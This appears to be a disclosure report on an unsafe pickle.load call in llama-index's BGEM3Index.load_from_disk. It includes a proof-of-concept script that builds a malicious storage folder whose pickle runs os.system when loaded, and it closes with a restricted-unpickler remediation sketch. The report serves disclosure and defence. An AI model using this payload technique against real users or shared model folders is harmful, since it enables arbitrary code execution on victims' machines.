---

### Vulnerability Overview

- **Vulnerability Type**: CWE-434: Unrestricted Upload of File with Dangerous Type
- **Severity**: High (8.8)
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Required Privileges**: None
- **User Interaction**: Required
- **Scope**: Unchanged
- **Confidentiality Impact**: High
- **Integrity Impact**: High
- **Availability Impact**: High
- **Vulnerable Codebase**: Pypi
- **Affected Version**: 0.11.16
- **Vulnerability Status**: Informative
- **Discoverer**:
  - **User**: life-team2024 @life-team2024
  - **User Level**: MIDDLEWEIGHT

---

### Vulnerability Details

- **Target**:
  - **Environment**:

    ```text
    python == 3.10.12
    llama-index == 0.11.16
    ```

- **Core Issue**: An attacker can supply a malicious pickle file that triggers arbitrary code execution when the victim calls the `load_from_disk` function.
- **Vulnerable Code**:
  - **Code**:

    ```python
    def load_from_disk(
        cls,
        persist_dir: str,
        model_name: str = "BAAI/bge-m3",
        index_name: str = "",
        weights_for_different_modes: List[float] = None,
    ) -> "BGEM3Index":
        sc = StorageContext.from_defaults(persist_dir=persist_dir)
        index = BGEM3Index(
            model_name=model_name,
            index_name=index_name,
            index_struct=sc.index_store.index_structs()[0],
            storage_context=sc,
            weights_for_different_modes=weights_for_different_modes,
        )
        docs_pos_to_node_id = {
            int(k): v for k, v in index.index_struct.nodes_dict.items()
        }
        index._docs_pos_to_node_id = docs_pos_to_node_id
        # Sink: unpickles a file from the caller-supplied directory without validation
        index._multi_embed_store = pickle.load(
            open(Path(persist_dir) / "multi_embed_store.pkl", "rb")
        )
        return index
    ```

- **Vulnerability Analysis**: `load_from_disk()` passes `multi_embed_store.pkl` from the caller-supplied `persist_dir` directly to `pickle.load()`. When an object is pickled, the callable and arguments returned by its `__reduce__` method are written into the stream, and `pickle.load()` invokes that callable with those arguments during deserialization. This is a documented feature of Python's pickle mechanism, so an attacker who controls the file can make the victim's process execute unintended code or run arbitrary commands.
- **Proof of Concept**:
  - **Concept**: I defined a payload class whose `__reduce__` method returns `os.system` with the argument `touch ./team-life`, and created a malicious folder laid out in the format that `BGEM3Index` expects for a persisted index.
  - **Code**:

    ```python
    import os
    import pickle

    from llama_index.indices.managed.bge_m3 import BGEM3Index


    class RCE:
        # pickle stores this (callable, args) pair; the callable runs at load time
        def __reduce__(self):
            return (os.system, ("touch ./team-life",))


    def generate_malicious_pkl():
        payload = pickle.dumps(RCE())
        os.makedirs("storage", exist_ok=True)
        # Malicious pickle placed where load_from_disk() looks for it
        with open("storage/multi_embed_store.pkl", "wb") as f:
            f.write(payload)
        # Stub files so that StorageContext.from_defaults() accepts the folder
        with open("storage/docstore.json", "w") as f:
            f.write('{"docstore": "docstore"}')
        with open("storage/index_store.json", "w") as f:
            f.write('{"index_store/data": {"idx1": {"__type__": "vector_store", "__data__": {}}}}')
        with open("storage/default_vector_store.json", "w") as f:
            f.write('{"vectorstore": "vectorstore"}')


    if __name__ == "__main__":
        generate_malicious_pkl()
    ```

  - **After Running Code**: The script produces a malicious folder named `storage`.
  - **If Victim Downloads the Storage Folder and Runs `BGEM3Index.load_from_disk(persist_dir="storage")`**: The command `touch ./team-life` executes on the victim’s machine.
- **Inspiration**: I was inspired by the following vulnerability reports to identify and report this issue: [Article 1](#), [Article 2](#), [Article 3](#)
- **Remediation Suggestion**: Because the vulnerability arises in the `pickle.load()` call, it is recommended to either remove this class or add an opt-in parameter such as `allow_dangerous_pkload`, so that users are explicitly warned about the risk before the file is loaded.
- **Impact**: If attackers upload malicious folders to model-sharing platforms such as Hugging Face Hub, they can attack every machine that downloads and loads the model.

---

### Incident History and Discussion

- **Control Permissions**:
- **Incident History and Details**:
  - Marked as `info` level and listed alongside similar vulnerability reports targeting the `run-llama/llama_index` team.
  - **Security vulnerability report submitted to project maintainers on GitHub**, one year ago.
  - **Report severity downgraded by ETF-runner-helper**, one year ago.
  - **Project maintainers confirmed the report**, one year ago.
  - **Planned release date automatically extended from January 2, 2025, to January 9, 2025**, one year ago.
  - **Comment by run-llama/llama_index maintainer**, one year ago.
  - **Comment by life-team2024**, one year ago.
  - **Comment by ETF-runner-helper**, one year ago.
  - **Comment by life-team2024**, one year ago.
- **Automated Actions**:
  - Report submitted to internal tracking system, one year ago.
  - Project maintainers of run-llama/llama_index notified, one year ago.
  - Research capability penalized for misjudging severity.
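
As a follow-up to the remediation suggestion in this report, the opt-in idea could look roughly like the sketch below. It is not the maintainers' fix and not part of the llama-index API. The function `load_multi_embed_store`, the class `RestrictedUnpickler`, and the allowlist are hypothetical names introduced here for illustration; only the flag name `allow_dangerous_pkload` comes from the report. The sketch assumes the stored object consists of plain built-in containers. A store holding other types (array objects, for example) would need its own reviewed allowlist entries or a non-pickle format.

```python
import builtins
import pickle
import warnings
from pathlib import Path
from typing import Any

# Hypothetical allowlist: only these built-in names may be resolved while
# unpickling. Anything else (os.system, subprocess.Popen, ...) is rejected.
_SAFE_BUILTINS = frozenset(
    {"dict", "list", "tuple", "set", "frozenset",
     "int", "float", "complex", "str", "bytes", "bool"}
)


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global outside a small allowlist."""

    def find_class(self, module: str, name: str) -> Any:
        # pickle calls find_class for each global referenced in the stream,
        # including the callable that a __reduce__ payload relies on.
        if module == "builtins" and name in _SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            f"global '{module}.{name}' is not allowed in multi_embed_store.pkl"
        )


def load_multi_embed_store(
    persist_dir: str, allow_dangerous_pkload: bool = False
) -> Any:
    """Load multi_embed_store.pkl, refusing unknown globals unless opted in."""
    path = Path(persist_dir) / "multi_embed_store.pkl"
    with open(path, "rb") as f:
        if allow_dangerous_pkload:
            # Explicit opt-in: behaves like plain pickle.load, but warns first.
            warnings.warn(
                "Unpickling without restrictions can execute arbitrary code; "
                "only load files from sources you trust.",
                RuntimeWarning,
                stacklevel=2,
            )
            return pickle.load(f)
        return RestrictedUnpickler(f).load()
```

With the default `allow_dangerous_pkload=False`, a file built like the proof of concept raises `pickle.UnpicklingError` before the payload's callable is resolved, while a file containing only plain dictionaries, lists, and numbers still loads. Overriding `find_class` is the approach that the Python documentation describes for restricting globals. It narrows the attack surface but does not make pickle a safe format for untrusted input.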